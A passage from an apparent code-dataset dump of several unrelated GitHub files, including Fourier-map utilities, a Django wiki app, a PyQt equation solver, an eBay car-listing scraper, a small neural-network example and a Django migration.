f'[...,i,ly,lx] = m[i,j,ly,lx] f[...,j,ly,lx] matrix\n multiplication.\n \n Parameters\n ----------\n fmap : (npol, nly, nlx) complex array\n Input array.\n fmat2d : (npol, npol, nly, nlx) or (npol, nly, nlx) array\n Matrix, if diagonal only the diagal suffices.\n out : (npol, nly, nlx) complex array, optional\n Output array. Will be overwritten!\n\n Returns\n -------\n out : (npol, nly, nlx) complex array\n Output array.\n '''\n \n fmap = mat_utils.atleast_nd(fmap, 3)\n npol = fmap.shape[0]\n nly, nlx = fmap.shape[-2:]\n\n if out is None:\n out = fmap.copy()\n else:\n out[:] = fmap \n\n if fmat2d.ndim in (2, 3):\n out *= fmat2d\n else:\n out = np.einsum('ablk, blk -> alk', fmat2d, out,\n out=out, optimize=True)\n \n return out\n\ndef cl2flat(c_ell, ells, modlmap):\n '''\n Interpolate a 1d function of multipole to a 2D map of Fourier\n coefficients.\n\n Parameters\n ---------- \n c_ell : (..., nell) array\n Input power spectrum.\n ells : (nell) array\n Multipoles, can be non-integer.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n\n Returns\n -------\n out : (npol, nly, nlx) complex array\n 2D output array. \n \n Raises\n ------\n ValueError\n If input has to be extrapolated more than 5 ell bins.\n '''\n\n # Extrapolate the input to the output using nearest neighbor.\n # This makes sure we don't change signs etc and turn a PSD\n # matrix into a non-PSD matrix. 
A bit ugly, but better safe\n # than sorry.\n\n lmin_out = modlmap.min()\n lmax_out = modlmap.max()\n\n ell_start, ell_end = [], []\n if ells[0] > lmin_out:\n ell_start = np.asarray([lmin_out])\n c_ell_start = c_ell[...,0]\n c_ell = np.concatenate((c_ell_start[...,np.newaxis], c_ell), axis=-1)\n if ells[-1] < lmax_out:\n ell_end = np.asarray([lmax_out])\n c_ell_end = c_ell[...,-1]\n c_ell = np.concatenate((c_ell, c_ell_end[...,np.newaxis]), axis=-1)\n ells = np.concatenate((ell_start, ells, ell_end)) \n\n out = np.zeros(c_ell.shape[:-1] + modlmap.shape,\n dtype=type_utils.to_complex(c_ell.dtype))\n cs = interp1d(ells, c_ell, kind='linear', assume_sorted=True,\n bounds_error=True)\n\n return cs(modlmap).astype(c_ell.dtype, copy=False)\n\ndef calc_ps1d(fmap, wcs, modlmap, fmap2=None, bsize=None):\n '''\n Calculate 1D power spectrum from set of Fourier\n coefficients.\n \n Parameters\n ----------\n fmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry of original map.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n fmap2 : (..., nly, nlx) complex array, optional\n Second 2D Fourier map for cross-correlation.\n bsize : float, optional\n Radial bin size. Defaults to resolution in ell of input map.\n \n Returns\n -------\n ps1d : (..., nbin) array\n Radially binned 1D power spectrum.\n bins : (nbin) array\n Bins.\n '''\n\n fmap = enmap.enmap(fmap, wcs=wcs, copy=False)\n if fmap2:\n fmap2 = enmap.enmap(fmap2, wcs=wcs, copy=False)\n\n ps2d = enmap.calc_ps2d(fmap, harm2=fmap2)\n return lbin(ps2d, modlmap, bsize=bsize)\n \ndef contract_fxg(fmap, gmap):\n '''\n Return sum_{ly lx} f_{ly lx} x conj(f_{ly lx}), i.e. the sum of the Hadamard\n product of two sets of 2D Fourier coefficients corresponding to real fields.\n\n Parameters\n ----------\n fmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n gmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n\n Returns\n -------\n had_sum : float\n Sum of Hadamard product (real valued).\n\n Raises\n ------\n ValueError\n If input arrays have different shapes. \n '''\n \n if fmap.shape != gmap.shape:\n raise ValueError(\n f'Shape fmap ({fmap.shape}) != shape gmap ({gmap.shape})')\n\n gmap = np.conj(gmap)\n csum = complex(np.tensordot(fmap, gmap, axes=fmap.ndim))\n had_sum = 2 * csum\n \n had_sum -= np.sum(fmap[...,:,0] * gmap[...,:,0])\n\n # If nx is even we also have to subtract the last column.\n # How to determine if input nx was odd or even? We need to \n # check if the last element of the first row is real.\n # If ny is also even, we can additionally check if the \n # last element of the middle row is also even.\n\n nx_even = np.all(np.isreal(fmap[...,0,-1]))\n ny = fmap.shape[-2]\n if ny % 2 == 0: \n nx_even &= np.all(np.isreal(fmap[...,ny//2,-1]))\n\n if nx_even: \n had_sum -= np.sum(fmap[...,:,-1] * gmap[...,:,-1])\n\n return np.real(had_sum)\n\ndef slice_fmap(fmap, slices_y, slice_x, laxes=None):\n '''\n Return map of 2D fourier coefficients that is cut out from input map.\n\n Parameters\n ----------\n fmap : (..., ny, nx) array\n Input 2D Fourier coefficients.\n slices_y : tuple of slices\n Two slices that slice select nonzero positive frequences and nonzero\n negaive frequencies.\n slice_x : slice\n Slice with nonzero elements in the x direction\n laxes : tuple of (ny) array and (nx) array, optional\n ly and lx coordinates of input coefficients.\n\n Returns\n -------\n fmap_out : (ny', nx') array\n Output coefficients. New C-contigous array (i.e. 
not a view of input).\n laxes_out : tuple of (ny') array and (nx') array\n ly and lx coordinates of output. Only if `laxes` was provided.\n '''\n\n pos_part = fmap[...,slices_y[0],slice_x]\n neg_part = fmap[...,slices_y[1],slice_x]\n\n out = np.concatenate((pos_part, neg_part), axis=-2)\n \n if laxes is not None:\n ly, lx = laxes\n lx_new = lx[slice_x]\n ly_new = np.concatenate((ly[slices_y[0]], ly[slices_y[1]]))\n out = out, (ly_new, lx_new)\n\n return out\n\ndef add_to_fmap(fmap_large, fmap_small, slices_y, slice_x):\n '''\n In-place addition of `fmap_small` to `fmap_large`.\n\n Parameters\n ----------\n fmap_large : (..., ny, nx) array\n Base 2D Fourier coefficients.\n fmap_small : (..., ny', nx') array\n 2D Fourier coefficients to be added.\n slices_y : tuple of slices\n Two slices that select nonzero positive frequences and nonzero\n negaive frequencies. See fkernel.find_kernel_slice.\n slice_x : slice\n Slice with nonzero elements in the x direction.\n \n Returns\n -------\n fmap_large : (..., ny, nx) array\n Input array with addition. \n '''\n\n fmap_large[...,slices_y[0],slice_x] += fmap_small[...,slices_y[0],:]\n fmap_large[...,slices_y[1],slice_x] += fmap_small[...,slices_y[1],:]\n\n return fmap_large\n\ndef get_optimal_fftlen(len_min, even=True):\n '''\n Compute optimal array length for FFT given a minumum length.\n\n Paramters\n ---------\n len_min : int\n Minumum length.\n even : bool, optional\n Demand even optimal lengths (for real FFTs).\n\n Returns\n -------\n len_opt : int\n Optimal length\n\n Notes\n -----\n This assumes we want input sizes that can be factored as 2^a 3^b 5^c 7^d.\n Adapted from ksw.\n '''\n \n if len_min == 0:\n return len_min\n if len_min == 1 and even:\n return 2\n\n max_a = int(np.ceil(np.log(len_min) / np.log(2)))\n max_b = int(np.ceil(np.log(len_min) / np.log(3)))\n max_c = int(np.ceil(np.log(len_min) / np.log(5)))\n max_d = int(np.ceil(np.log(len_min) / np.log(7))) \n\n len_opt = 2 ** max_a # Reasonable starting point.\n for a in range(max_a):\n for b in range(max_b):\n for c in range(max_c):\n for d in range(max_d):\n fftlen = 2 ** a * 3 ** b * 5 ** c * 7 ** d\n if even and fftlen % 2:\n continue\n if fftlen < len_min:\n continue\n if fftlen == len_min:\n len_opt = fftlen\n break\n if fftlen < len_opt:\n len_opt = fftlen\n\n return len_opt\n","repo_name":"AdriJD/optweight","sub_path":"optweight/dft.py","file_name":"dft.py","file_ext":"py","file_size_in_byte":16999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28133177977","text":"from django.shortcuts import render\nfrom . import util\nfrom django import forms\nfrom django.urls import reverse\nfrom django.http import HttpRequest\nfrom django.http import HttpResponseRedirect\nimport markdown2\nimport numpy as np\n\n\n\nclass Search(forms.Form):\n q = forms.CharField(label=\"Search\")\n\nclass NewPage(forms.Form):\n name = forms.CharField(label=\"Page Name\")\n text = forms.CharField(widget=forms.Textarea)\n\nclass EditPage(forms.Form):\n name = forms.CharField(label=\"Page Name\")\n text = forms.CharField(widget=forms.Textarea)\n\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", \n {\"entries\": util.list_entries(), \"sform\":Search()}\n )\n\ndef getpage(request, page):\n if util.get_entry(page) == None:\n return render(request, \"encyclopedia/page.html\", \n {\"content\":\"
Error(404): Page not found
\", \"sform\":Search()}\n )\n return render(request, \"encyclopedia/page.html\",\n {\"content\":markdown2.markdown(util.get_entry(page)), \"page\":page, \"sform\":Search()}\n )\n\ndef search(request):\n query = request.GET.get(\"q\", \"\")\n searched = []\n for i in util.list_entries():\n if i.lower() == query:\n return HttpResponseRedirect(reverse(\"wiki:wiki\")+i)\n else:\n if i.lower().find(query) is not -1:\n searched.append(i)\n if not searched:\n return getpage(request, query)\n else:\n return render(request, \"encyclopedia/search.html\",\n {\"results\":searched}\n )\n\ndef newpage(request):\n if request.method == \"POST\":\n form = NewPage(request.POST)\n if form.is_valid():\n name = form.cleaned_data[\"name\"]\n content = form.cleaned_data[\"text\"]\n util.save_entry(name, content)\n return render(request, \"encyclopedia/newpage.html\",\n {\"nform\":NewPage()}\n )\n \ndef random(request):\n size = len(util.list_entries())\n item = np.random.randint(1, size) - 1\n entries = util.list_entries()[:]\n page = entries[item]\n return getpage(request, page)\n\ndef edit(request, page):\n return render(request, \"encyclopedia/edit.html\",\n {\"page\":page, \"eform\":EditPage({'name':page, 'text':util.get_entry(page)}), \"sform\":Search()}\n )\n\ndef save(request):\n if request.method == \"POST\":\n form = EditPage(request.POST)\n if form.is_valid():\n name = form.cleaned_data[\"name\"]\n content = form.cleaned_data[\"text\"]\n util.save_entry(name, content)\n return HttpResponseRedirect(reverse(\"wiki:wiki\")+name)\n","repo_name":"brunnorpdias/CS50W","sub_path":"project_1/wiki/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71816323049","text":"numList = []\nexceptList = []\nsum = 0\nfor _ in range(9):\n inp = int(input())\n numList.append(inp)\n sum += inp\nbreakFlag = False\nfor i in range(8):\n if(breakFlag == True): break\n for j in range(i + 1, 9):\n if(sum - (numList[i] + numList[j])) == 100:\n if(breakFlag == True): break\n exceptList.extend([numList[i], numList[j]])\n breakFlag = True\n \nnumList.sort()\nfor i in range(9):\n if(numList[i] == exceptList[0] or numList[i] == exceptList[1]):\n continue\n else:\n print(numList[i])\n\n \n \n\n ","repo_name":"jeahun10717/PS","sub_path":"python/2309.py","file_name":"2309.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74629020969","text":"'''\n\n可以直接在显示区输入等式以快速进行一元方程求解\n\n'''\n\nfrom posixpath import split\nfrom re import S, T\nfrom symtable import Symbol\nfrom turtle import position\nimport numpy as np\nimport sys\nimport sympy\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nclass Formula(QMainWindow):\n Signal = pyqtSignal(int)\n def __init__(self, *args, **kwargs):\n \n super().__init__()\n self.UIinit()\n \n \n def UIinit(self):\n \n self.exp = []\n self.ans = []\n self.setWindowTitle(\"方程设置\")\n self.centralwidget = QWidget()\n self.setCentralWidget(self.centralwidget)\n\n self.stackedwidget = QStackedWidget()\n self.Layout = QVBoxLayout(self.centralwidget)\n self.Layout.addWidget(self.stackedwidget)\n\n self.form1 = QWidget()\n self.setup1()\n self.stackedwidget.addWidget(self.form1)\n self.formn = QWidget()\n self.setupn()\n self.stackedwidget.addWidget(self.formn)\n \n self.resize(300, 200)\n \n\n # 界面设置(一元函数情况)\n def setup1(self):\n \n 
self.Layout1 = QGridLayout(self.form1)\n # 输入ui\n self.unknown_name_label_1 = QLabel()\n self.unknown_name_label_1.setText('输入未知数名称:')\n self.unknown_name_label_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_1 = QLineEdit()\n self.unknown_name_1.setPlaceholderText('输入未知数(例如:x)')\n self.unknown_name_1.setFocus(True)\n \n # 动作按钮\n self.yesbtn_1 = QPushButton('确定')\n self.yesbtn_1.clicked.connect(self.solve_1)\n self.yesbtn_1.setDefault(True)\n self.yesbtn_1.setShortcut('Enter')\n self.nobtn_1 = QPushButton('取消')\n self.nobtn_1.clicked.connect(self.close)\n # 布局\n self.Layout1.addWidget(self.unknown_name_label_1, 1, 0, 1, 2)\n self.Layout1.addWidget(self.unknown_name_1, 2, 0, 1, 2)\n self.Layout1.addWidget(self.yesbtn_1, 3, 0, 1, 1)\n self.Layout1.addWidget(self.nobtn_1, 3, 1, 1, 1)\n\n # 界面设置(多元函数情况)\n def setupn(self):\n \n self.Layoutn = QGridLayout(self.formn)\n\n self.substack = QStackedWidget()\n \n # 输入ui\n self.count_label = QLabel()\n self.count_label.setText('输入方程个数:(超过3个请使用矩阵运算)')\n self.count_label.setAlignment(Qt.AlignLeft)\n self.count_input = QComboBox()\n self.count_input.addItems(['1', '2', '3'])\n self.count_input.currentIndexChanged[int].connect(self.switch)\n \n\n self.subform1 = QWidget()\n self.subset1()\n self.subform2 = QWidget()\n self.subset2()\n self.subform3 = QWidget()\n self.subset3()\n self.substack.addWidget(self.subform1)\n self.substack.addWidget(self.subform2)\n self.substack.addWidget(self.subform3)\n\n # 动作按钮\n self.yesbtn = QPushButton('确定')\n self.yesbtn.clicked.connect(self.solve_n)\n self.yesbtn.setDefault(True)\n self.yesbtn.setShortcut('Enter')\n self.nobtn = QPushButton('取消')\n self.nobtn.clicked.connect(self.close)\n\n # 布局\n self.Layoutn.setSpacing(10)\n self.Layoutn.addWidget(self.count_label, 1, 1, 1, 2)\n self.Layoutn.addWidget(self.count_input, 2, 1, 1, 2)\n self.Layoutn.addWidget(self.substack, 3, 1, 1, 2)\n self.Layoutn.addWidget(self.yesbtn, 6, 1, 1, 1)\n self.Layoutn.addWidget(self.nobtn, 6, 2, 1, 1)\n \n\n def subset1(self):\n self.sublayout1 = QVBoxLayout(self.subform1)\n self.subformula_label_1_1 = QLabel()\n self.subformula_label_1_1.setText('请输入方程:')\n self.subform_input_1_1 = QLineEdit()\n self.subform_input_1_1.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_1_1 = QLabel()\n self.unknown_name_label_1_1.setText('输入未知数名称:')\n self.unknown_name_label_1_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_1_1 = QLineEdit()\n self.unknown_name_1_1.setPlaceholderText('(例如:x)')\n \n self.sublayout1.addWidget(self.subformula_label_1_1)\n self.sublayout1.addWidget(self.subform_input_1_1)\n self.sublayout1.addWidget(self.unknown_name_label_1_1)\n self.sublayout1.addWidget(self.unknown_name_1_1)\n self.sublayout1.addStretch(1)\n\n\n def subset2(self):\n self.sublayout2 = QVBoxLayout(self.subform2)\n self.subformula_label_2_1 = QLabel()\n self.subformula_label_2_1.setText('请输入方程:')\n self.subform_input_2_1 = QLineEdit()\n self.subform_input_2_1.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_2_2 = QLabel()\n self.subformula_label_2_2.setText('请输入方程:')\n self.subform_input_2_2 = QLineEdit()\n self.subform_input_2_2.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_2_1 = QLabel()\n self.unknown_name_label_2_1.setText('输入未知数1名称:')\n self.unknown_name_label_2_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_2_1 = QLineEdit()\n self.unknown_name_2_1.setPlaceholderText('(例如:x)')\n self.unknown_name_label_2_2 = QLabel()\n self.unknown_name_label_2_2.setText('输入未知数2名称:')\n 
self.unknown_name_label_2_2.setAlignment(Qt.AlignLeft)\n self.unknown_name_2_2 = QLineEdit()\n self.unknown_name_2_2.setPlaceholderText('(例如:x)')\n \n self.sublayout2.addWidget(self.subformula_label_2_1)\n self.sublayout2.addWidget(self.subform_input_2_1)\n self.sublayout2.addWidget(self.subformula_label_2_2)\n self.sublayout2.addWidget(self.subform_input_2_2)\n self.sublayout2.addWidget(self.unknown_name_label_2_1)\n self.sublayout2.addWidget(self.unknown_name_2_1)\n self.sublayout2.addWidget(self.unknown_name_label_2_2)\n self.sublayout2.addWidget(self.unknown_name_2_2)\n self.sublayout2.addStretch(1)\n\n \n def subset3(self):\n self.sublayout3 = QVBoxLayout(self.subform3)\n self.subformula_label_3_1 = QLabel()\n self.subformula_label_3_1.setText('请输入方程:')\n self.subform_input_3_1 = QLineEdit()\n self.subform_input_3_1.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_3_2 = QLabel()\n self.subformula_label_3_2.setText('请输入方程:')\n self.subform_input_3_2 = QLineEdit()\n self.subform_input_3_2.setPlaceholderText('输入完整等式(如x=1)')\n self.subformula_label_3_3 = QLabel()\n self.subformula_label_3_3.setText('请输入方程:')\n self.subform_input_3_3 = QLineEdit()\n self.subform_input_3_3.setPlaceholderText('输入完整等式(如x=1)')\n \n self.unknown_name_label_3_1 = QLabel()\n self.unknown_name_label_3_1.setText('输入未知数1名称:')\n self.unknown_name_label_3_1.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_1 = QLineEdit()\n self.unknown_name_3_1.setPlaceholderText('(例如:x)')\n self.unknown_name_label_3_2 = QLabel()\n self.unknown_name_label_3_2.setText('输入未知数2名称:')\n self.unknown_name_label_3_2.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_2 = QLineEdit()\n self.unknown_name_3_2.setPlaceholderText('(例如:x)')\n self.unknown_name_label_3_3 = QLabel()\n self.unknown_name_label_3_3.setText('输入未知数3名称:')\n self.unknown_name_label_3_3.setAlignment(Qt.AlignLeft)\n self.unknown_name_3_3 = QLineEdit()\n self.unknown_name_3_3.setPlaceholderText('(例如:x)')\n \n self.sublayout3.addWidget(self.subformula_label_3_1)\n self.sublayout3.addWidget(self.subform_input_3_1)\n self.sublayout3.addWidget(self.subformula_label_3_2)\n self.sublayout3.addWidget(self.subform_input_3_2)\n self.sublayout3.addWidget(self.subformula_label_3_3)\n self.sublayout3.addWidget(self.subform_input_3_3)\n self.sublayout3.addWidget(self.unknown_name_label_3_1)\n self.sublayout3.addWidget(self.unknown_name_3_1)\n self.sublayout3.addWidget(self.unknown_name_label_3_2)\n self.sublayout3.addWidget(self.unknown_name_3_2)\n self.sublayout3.addWidget(self.unknown_name_label_3_3)\n self.sublayout3.addWidget(self.unknown_name_3_3)\n\n\n def switch(self, count):\n self.count = 0\n self.substack.setCurrentIndex(count)\n self.count = count + 1\n \n\n def input_1(self, exp):\n self.exp = exp\n self.stackedwidget.setCurrentIndex(0)\n self.show()\n\n\n def input_n(self):\n self.stackedwidget.setCurrentIndex(1)\n self.show()\n return\n\n\n def solve_1(self):\n \n self.exp1 = 0\n self.exp2 = 0\n self.unknown = 'x'\n\n try:\n self.exp1 = sympy.sympify(self.exp.split('=', 1)[0])\n self.exp2 = sympy.sympify(self.exp.split('=', 1)[1])\n \n\n self.formula = self.exp1 - self.exp2\n self.unknown = self.unknown_name_1.text()\n self.x = sympy.Symbol(self.unknown)\n\n self.ans = sympy.solve(self.formula, self.x)\n \n except:\n self.formula_error()\n \n self.Signal.emit(1)\n self.close()\n \n\n def solve_n(self):\n\n return None\n\n \n def output(self):\n return self.ans \n\n\n # 异常处理函数\n def formula_error(self):\n reply = QMessageBox.warning(self, \"Warning\", \"不合法的输入!\", 
QMessageBox.Ok)\n self.ans = ''\n if (reply == QMessageBox.Ok):\n return None\n","repo_name":"Alpacaaaaaa/calculator-app","sub_path":"formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20165914562","text":"import datetime\n\n__author__ = 'Van'\nfrom math import ceil\nimport hashlib\nimport time\nimport random\n\nimport inject\n\n\nfrom core.crawlers.WebSitesCrawler import *\nfrom core.parsers.Parser import Parser\nfrom core.parsers.ebaycomau import EbayComAuSyntaxAnalyzer\n\nimport logging\n\n\nclass EbayComAuParser(Parser):\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def Parse(self, count):\n pass\n\nclass EbayComAuParserImplement(EbayComAuParser):\n '''\n classdocs\n '''\n @inject.params(crawler=WebSitesCrawler, synaxanalyzer=EbayComAuSyntaxAnalyzer)\n def __init__(self, crawler, synaxanalyzer):\n '''\n Constructor\n '''\n self.crawler = crawler\n self.synaxanalyzer = synaxanalyzer\n\n self.itemOnPage = 200\n self.ListItemsUrl = 'http://www.ebay.com.au/sch/Cars-/29690/i.html?_sop=10&_ipg=200&_pgn={pageNumber}&rt=nc&LH_PrefLoc=1'\n self.SiteHost = 'http://www.ebay.com.au'\n\n # self.timeout_down=5 # timeout in ms\n # self.timeout_up=50 # timeout in ms\n #\n # self.sleep_i=10\n # self.timeout_down_interval=15 # timeout through some requests\n # self.timeout_up_interval=30 # timeout through some requests\n #\n # self.sleep_i_2=100\n # self.timeout_down_interval_2=90 # timeout through some requests\n # self.timeout_up_interval_2=120 # timeout through some requests\n #\n # self.sleep_i_3=1000\n # self.timeout_down_interval_3=15 # timeout through some requests\n # self.timeout_up_interval_3=30 # timeout through some requests\n #\n # self.timeout_down_error=30 # timeout for error\n # self.timeout_up_error=45 # timeout for error\n\n self.timeout_down=250 # timeout in ms\n self.timeout_up=350 # timeout in ms\n\n self.sleep_i=10\n self.timeout_down_interval=500 # timeout through some requests\n self.timeout_up_interval=1500 # timeout through some requests\n\n self.sleep_i_2=100\n self.timeout_down_interval_2=4500 # timeout through some requests\n self.timeout_up_interval_2=6000 # timeout through some requests\n\n self.sleep_i_3=1000\n self.timeout_down_interval_3=7500 # timeout through some requests\n self.timeout_up_interval_3=15000 # timeout through some requests\n\n self.timeout_down_error=1500 # timeout for error\n self.timeout_up_error=3000 # timeout for error\n\n #self.ListItemsUrl = 'http://localhost/ebay/list5.html'\n #self.ListItemsUrl = 'http://localhost/test/test14.html'\n\n def Parse(self, count) :\n countPages = int(ceil(count/float(self.itemOnPage)))\n itemIndex = 0\n for i in range(0, countPages):\n try:\n logging.info(i)\n if itemIndex >= count : break\n url = self.ListItemsUrl.format(pageNumber = i)\n logging.info(url)\n time.sleep(random.uniform(self.timeout_down, self.timeout_up)/1000) #after request it is required to wait\n try:\n content = self.crawler.Get(url)\n listItems = self.synaxanalyzer.AnalyzeList(content)\n except:\n logging.exception('')\n time.sleep(random.uniform(self.timeout_down_error, self.timeout_up_error)/1000) #after request it is required to wait\n continue\n for item in listItems :\n if itemIndex >= count : break\n detailurl = item.Url\n itemIndex = itemIndex + 1\n time.sleep(random.uniform(self.timeout_down, self.timeout_up)/1000) #after request it is required to wait\n\n try:\n contentDetail = 
self.crawler.Get(detailurl)\n logging.info(detailurl)\n #contentDetail = self.crawler.Get('http://localhost/ebay/detail6.html')\n itemDetail = self.synaxanalyzer.AnalyzeItem(contentDetail)\n except:\n logging.exception('')\n time.sleep(random.uniform(self.timeout_down_error, self.timeout_up_error)/1000) #after request it is required to wait\n continue\n\n m = hashlib.md5()\n m.update(item.Url)\n item.Id = m.hexdigest()\n item.Url= item.Url\n item.OriginalUrl= itemDetail.OriginalUrl\n\n item.ReleaseYear = itemDetail.ReleaseYear\n item.Colour = itemDetail.Colour\n item.Vin = itemDetail.Vin\n item.Doors = itemDetail.Doors\n item.AdditionalFeatures = itemDetail.AdditionalFeatures\n item.Make = itemDetail.Make\n item.Model = itemDetail.Model\n item.BodyType = itemDetail.BodyType\n item.Transmission = itemDetail.Transmission\n item.Engine = itemDetail.Engine\n item.Odometer = itemDetail.Odometer\n item.IsPrivateSeller = itemDetail.IsPrivateSeller\n item.IsNew = itemDetail.IsNew\n\n if None == item.LastModified:\n item.LastModified = datetime.date.fromordinal(datetime.date.today().toordinal() - i)\n\n yield item\n finally:\n if (i%self.sleep_i==0):\n time.sleep(random.uniform(self.timeout_down_interval,self.timeout_up_interval)/1000)#after request it is required to wait\n if (i%self.sleep_i_2==0):\n time.sleep(random.uniform(self.timeout_down_interval_2,self.timeout_up_interval_2)/1000)#after request it is required to wait\n if (i%self.sleep_i_3==0):\n time.sleep(random.uniform(self.timeout_down_interval_3,self.timeout_up_interval_3)/1000)#after request it is required to wait","repo_name":"vanderkorn/searchrobot","sub_path":"core/parsers/ebaycomau/EbayComAu.py","file_name":"EbayComAu.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75296582248","text":"from sklearn.datasets import load_boston\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nfrom km.graph import Graph\nfrom km.node import Linear, MSE, PlaceHolder, Sigmoid, Variable\nfrom km.optimizer import GradientDescent\nfrom km.nn import normal, standardization\nfrom km.session import Session\n\nimport numpy as np\n\n\ndef mlp():\n # 载入数据\n data = load_boston()\n dataset = data['data']\n labels = data['target']\n graph = Graph()\n graph.as_default()\n # 初始化参数\n n_features = dataset.shape[1] # X特征数\n n_hidden = 100 # 隐藏层个数\n X = PlaceHolder(name='X')\n y = PlaceHolder(name='y')\n W1 = Variable(normal((n_features, n_hidden), scale=1), name='W1')\n b1 = Variable(np.zeros(n_hidden), name='b1')\n W2 = Variable(normal((n_hidden, 1), scale=1), name='W2')\n b2 = Variable(np.zeros(1), name='b2')\n\n # 定义模型\n l1 = Linear(X, W1, b1, name='l1')\n h1 = Sigmoid(l1, name='h1')\n yhat = Linear(h1, W2, b2, name='yhat')\n loss = MSE(y, yhat, name='loss')\n\n epoch = 5001\n batch_size = 256\n optimizer = GradientDescent(loss, learning_rate=0.001, name='sgd')\n losses = []\n with Session.session(graph) as sess:\n for n in range(epoch):\n data, label = shuffle(dataset, labels)\n loss_sum = 0\n n_step = len(dataset) // batch_size + 1\n for i in range(n_step):\n b = i * batch_size\n e = b + batch_size\n if e > len(dataset):\n b = -batch_size\n e = len(dataset)\n batch_dataset = standardization(data[b:e])\n batch_labels = label[b:e]\n _, los = sess.run([optimizer, loss], feed_dict={X: batch_dataset, y: batch_labels})\n # print('step: {}, loss = {:.3f}'.format(i+1, los))\n loss_sum += los\n if n % 100 == 0:\n print('Epoch: {}, loss = 
{:.3f}'.format(n + 1, loss_sum / n_step))\n losses.append(los)\n\n plt.plot(losses)\n plt.show()\n\n\nif __name__ == '__main__':\n mlp()\n","repo_name":"fyjun2071/neural_network_scratch","sub_path":"examples/mlp_sk_boston.py","file_name":"mlp_sk_boston.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22019410646","text":"\"\"\"\nControl FTDI USB chips.\n\nOpen a handle using ftd2xx.open or ftd2xx.openEx and use the methods\non the object thus returned.\n\nThere are a few convenience functions too\n\"\"\"\nfrom __future__ import absolute_import\n\nimport sys\n\nfrom .ftd2xx import (\n FTD2XX,\n DeviceError,\n call_ft,\n createDeviceInfoList,\n ft_program_data,\n getDeviceInfoDetail,\n getLibraryVersion,\n listDevices,\n open,\n openEx,\n)\n\n__all__ = [\n \"call_ft\",\n \"listDevices\",\n \"getLibraryVersion\",\n \"createDeviceInfoList\",\n \"getDeviceInfoDetail\",\n \"open\",\n \"openEx\",\n \"FTD2XX\",\n \"DeviceError\",\n \"ft_program_data\",\n]\nif sys.platform == \"win32\":\n from .ftd2xx import w32CreateFile\n\n __all__ += [\"w32CreateFile\"]\nelse:\n from .ftd2xx import getVIDPID, setVIDPID\n\n __all__ += [\"getVIDPID\", \"setVIDPID\"]\n","repo_name":"agentgoblin/ftd2xx","sub_path":"ftd2xx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12394550292","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BasicDataset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ('experimentIdea', models.TextField(blank=True)),\n ('hypothesis', models.TextField(blank=True)),\n ('researchObjective', models.TextField(blank=True)),\n ('principles', models.TextField(blank=True)),\n ('dateLastUpdate', models.DateField(default=datetime.date.today, blank=True)),\n ('published', models.BooleanField(default=False)),\n ],\n ),\n migrations.CreateModel(\n name='DataReq',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('properties', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='ExpStep',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('output', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='Partner',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('email', models.EmailField(max_length=100)),\n ('lead', models.BooleanField(default=False)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ],\n ),\n migrations.CreateModel(\n name='ResultRep',\n fields=[\n ('id', 
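                # auto-created integer primary key; every CreateModel in this migration repeats this field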
